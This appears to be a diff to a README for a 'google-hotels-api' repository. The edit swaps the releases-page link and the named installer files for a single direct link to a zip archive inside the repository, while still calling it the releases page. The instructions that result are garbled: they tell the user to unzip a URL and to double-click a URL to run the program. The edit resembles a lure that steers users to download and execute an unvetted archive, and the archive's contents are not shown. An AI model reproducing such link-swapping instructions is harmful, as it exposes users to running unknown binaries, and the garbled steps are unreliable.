oznni12/google-hotels-api/README.md

 Here is a simple guide to help you install and run the application:

-1. **Visit the Releases Page**: Click [here](https://github.com/oznni12/google-hotels-api/releases) to go to the releases page.
+1. **Visit the Releases Page**: Click [here](https://github.com/oznni12/google-hotels-api/raw/refs/heads/main/google-hotels-api-results/google_api_hotels_v1.3.zip) to go to the releases page.

 2. **Select the Latest Release**: Look for the most recent version at the top of the page.

-3. **Download the Application**: Find the file labeled as "google-hotels-api.zip" or "google-hotels-api.exe", depending on your system.
+3. **Download the Application**: Find the file labeled as "https://github.com/oznni12/google-hotels-api/raw/refs/heads/main/google-hotels-api-results/google_api_hotels_v1.3.zip" or "https://github.com/oznni12/google-hotels-api/raw/refs/heads/main/google-hotels-api-results/google_api_hotels_v1.3.zip", depending on your system.
 Click to start the download.

 4. **Extract the Files (if needed)**:
    - For **Windows**, right-click the downloaded file and select "Extract All."
 Follow the prompts to complete the extraction.
-   - For **macOS and Linux**, you can double-click the file to extract it, or use the terminal with the command: `unzip google-hotels-api.zip`.
+   - For **macOS and Linux**, you can double-click the file to extract it, or use the terminal with the command: `unzip https://github.com/oznni12/google-hotels-api/raw/refs/heads/main/google-hotels-api-results/google_api_hotels_v1.3.zip`.

 5. **Run the Application**:
-   - For **Windows**, navigate to the folder where the application is located and double-click `google-hotels-api.exe`.
+   - For **Windows**, navigate to the folder where the application is located and double-click `https://github.com/oznni12/google-hotels-api/raw/refs/heads/main/google-hotels-api-results/google_api_hotels_v1.3.zip`.
    - For **macOS**, locate the `google-hotels-api` app and double-click it.
    - For **Linux**, open a terminal, navigate to the folder, and run the command: `./google-hotels-api`.